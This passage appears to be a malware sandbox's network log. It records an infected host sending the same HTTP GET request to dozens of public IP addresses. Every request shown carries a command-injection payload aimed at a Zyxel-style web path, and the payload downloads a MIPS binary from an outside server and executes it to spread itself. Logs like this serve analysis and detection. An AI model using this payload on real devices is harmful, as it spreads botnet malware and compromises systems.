                                                Jan 12, 2024 18:16:38.821681023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8405192.168.2.2336444130.226.111.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821770906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8406192.168.2.235479046.239.147.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821809053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8407192.168.2.2347954192.30.95.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821890116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8408192.168.2.2339898169.11.112.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821926117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8409192.168.2.2352462223.159.71.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821983099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8410192.168.2.2339928205.241.127.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822068930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8411192.168.2.234091625.105.187.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822105885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8412192.168.2.2333062184.198.209.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822150946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8413192.168.2.234159450.125.24.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822213888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8414192.168.2.234834062.63.218.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822299957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8415192.168.2.234244231.39.72.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822339058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8416192.168.2.2349414101.228.220.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822391033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8417192.168.2.234845675.137.16.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822473049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8418192.168.2.2356394163.208.221.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822520971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8419192.168.2.234374898.64.72.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822570086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8420192.168.2.236070491.14.8.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822632074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8421192.168.2.2351598103.228.48.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822699070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8422192.168.2.23507221.128.253.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822755098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8423192.168.2.234691639.197.104.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822808027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8424192.168.2.2339690189.141.195.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822870970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8425192.168.2.2339748107.77.189.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822901011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8426192.168.2.233351898.119.172.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.822952986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8427192.168.2.235580272.127.5.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823007107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8428192.168.2.2345180110.136.86.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823055983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8429192.168.2.2358362106.82.198.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823090076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8430192.168.2.233351489.61.14.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823154926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8431192.168.2.2358332175.221.25.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823215008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8432192.168.2.2358456128.137.30.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823245049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8433192.168.2.2358940111.16.13.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823316097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8434192.168.2.2344236165.108.112.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823390007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8435192.168.2.235273289.252.139.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823414087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8436192.168.2.2348306163.148.10.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823470116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8437192.168.2.234868248.182.34.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823519945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8438192.168.2.2352242194.2.82.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823579073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8439192.168.2.2346024162.115.127.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823615074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8440192.168.2.235401252.151.148.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823678970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8441192.168.2.2338634195.143.233.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823710918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8442192.168.2.235476082.154.221.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823792934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8443192.168.2.234386661.128.98.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823842049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8444192.168.2.2348368111.124.15.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823904991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8445192.168.2.2356996148.230.20.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.823949099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8446192.168.2.2353144177.13.189.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824006081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8447192.168.2.234617084.93.48.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824027061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8448192.168.2.2349654130.182.99.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824084044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8449192.168.2.235066067.131.46.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824151039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8450192.168.2.235687661.115.1.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824213982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8451192.168.2.2344700201.100.129.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824273109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8452192.168.2.2345756178.169.129.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824312925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8453192.168.2.2338446138.103.33.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824354887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8454192.168.2.233628486.99.89.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824429989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8455192.168.2.2337536182.232.104.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824443102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8456192.168.2.234961459.170.32.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824485064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8457192.168.2.234229841.206.47.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824539900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8458192.168.2.234225814.107.102.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824604034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8459192.168.2.2348324153.233.38.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824647903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8460192.168.2.2339430121.210.175.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824671030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8461192.168.2.2347134200.187.235.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824713945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8462192.168.2.236041424.78.70.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824783087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8463192.168.2.234613442.143.87.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824839115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8464192.168.2.2359110183.237.30.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824894905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8465192.168.2.233761470.187.205.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.824943066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8466192.168.2.233937659.80.46.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.825006008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8467192.168.2.2335912213.204.28.154443
                                                TimestampBytes transferredDirectionData
